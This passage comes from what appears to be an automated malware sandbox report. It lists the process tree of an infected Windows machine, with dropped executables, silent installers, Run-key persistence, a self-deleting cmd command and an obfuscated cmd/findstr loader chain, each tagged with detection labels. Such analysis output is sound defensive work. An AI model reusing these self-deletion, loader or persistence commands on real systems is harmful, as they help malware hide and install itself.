C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Enumerates system info in registry
PID:9612
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5896
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:10008
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7644
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:476
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1312
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:4832
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10448
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6236
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8008
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10280
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5964
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8728
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5424
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:2500
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7400
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9764
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12560
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13120 -s 284⤵
- Program crash
PID:13292
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12816
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:4556
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12608
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12500
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12832
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7016
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13124
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8240
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13200
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:13444
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1376
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13764
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13352 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14132
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13956
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13348
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14052
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13948
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10536 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14284
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14268
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13016 -s 284⤵
- Program crash
PID:14068
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11432
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5020
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14000
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12252 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1268
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13916
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11360
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14316
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12368
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12640
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11772
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:2152
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6256
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1624
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13496 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14300
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12268
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:12144
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13044
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:13740
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11376
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14780
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14408
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:15220
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:14712
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9800 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:12848
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8068
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11744
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8068
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:15556
-
-
-
C:\Users\Admin\Documents\aSdNRGGOPzOtSyZMA8ci1a65.exe"C:\Users\Admin\Documents\aSdNRGGOPzOtSyZMA8ci1a65.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2080 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:2644
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"3⤵
- Executes dropped EXE
PID:3356
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Users\Admin\Documents\6HArcFNxuMLRyOVZuW33yZTr.exe"C:\Users\Admin\Documents\6HArcFNxuMLRyOVZuW33yZTr.exe"2⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 2723⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
-
C:\Users\Admin\Documents\oa2u56KuFk2i7XYMA0xMSNi2.exe"C:\Users\Admin\Documents\oa2u56KuFk2i7XYMA0xMSNi2.exe"2⤵
- Executes dropped EXE
PID:3804
-
-
C:\Users\Admin\Documents\wPt6bm7uNglQB6DC0fWJlmim.exe"C:\Users\Admin\Documents\wPt6bm7uNglQB6DC0fWJlmim.exe"2⤵
- Executes dropped EXE
PID:4448 -
C:\Users\Admin\Documents\wPt6bm7uNglQB6DC0fWJlmim.exe"C:\Users\Admin\Documents\wPt6bm7uNglQB6DC0fWJlmim.exe" -u3⤵PID:1752
-
-
-
C:\Users\Admin\Documents\yS9T56oZWXoqJTlZbDPY26ud.exe"C:\Users\Admin\Documents\yS9T56oZWXoqJTlZbDPY26ud.exe"2⤵
- Executes dropped EXE
PID:3168 -
C:\Users\Admin\AppData\Local\Temp\is-KA6LU.tmp\yS9T56oZWXoqJTlZbDPY26ud.tmp"C:\Users\Admin\AppData\Local\Temp\is-KA6LU.tmp\yS9T56oZWXoqJTlZbDPY26ud.tmp" /SL5="$10288,138429,56832,C:\Users\Admin\Documents\yS9T56oZWXoqJTlZbDPY26ud.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\is-1DD1Q.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1DD1Q.tmp\Setup.exe" /Verysilent4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs75⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4984 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e4c046f8,0x7ff9e4c04708,0x7ff9e4c047186⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:26⤵PID:7000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:86⤵PID:6220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:16⤵PID:6248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:16⤵PID:6844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:16⤵PID:472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:16⤵PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:86⤵PID:7792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:8020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5860 /prefetch:26⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:16⤵PID:8376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,14339927527799907074,9898311612916664751,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:16⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2576
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5400 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"6⤵PID:7864
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:9448
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"5⤵PID:5516
-
C:\Users\Admin\AppData\Roaming\4415951.exe"C:\Users\Admin\AppData\Roaming\4415951.exe"6⤵PID:6604
-
-
C:\Users\Admin\AppData\Roaming\4983392.exe"C:\Users\Admin\AppData\Roaming\4983392.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:6716
-
-
C:\Users\Admin\AppData\Roaming\5681660.exe"C:\Users\Admin\AppData\Roaming\5681660.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:6936
-
-
C:\Users\Admin\AppData\Roaming\3177725.exe"C:\Users\Admin\AppData\Roaming\3177725.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:7116
-
-
C:\Users\Admin\AppData\Roaming\1031968.exe"C:\Users\Admin\AppData\Roaming\1031968.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 24447⤵
- Program crash
PID:8744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 24447⤵
- Program crash
PID:10036
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exe"6⤵
- Adds Run key to start application
PID:5148 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:6020
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Pei.xll7⤵PID:4664
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:7248
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^HlGEvpOWJOEhLjtMCMDsxiaRDGubGurupaMHjGXUgfrcGybsXUFbdIsmSOwQrdfCLnrzmbAVPJrtrXlnpOAMBGPBqjObFuRXZBJowtRmxKIHEjcVEDHgPDwyIBahIedISyy$" Passa.xll9⤵PID:2220
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Runs ping.exe
PID:8432
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comTra.exe.com o9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8196 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o10⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o11⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o12⤵PID:9044
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"5⤵PID:5876
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a6⤵PID:256
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent5⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\is-B448D.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-B448D.tmp\stats.tmp" /SL5="$202F2,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent6⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\is-7SM07.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7SM07.tmp\Setup.exe" /Verysilent7⤵
- Suspicious behavior: EnumeratesProcesses
PID:7908 -
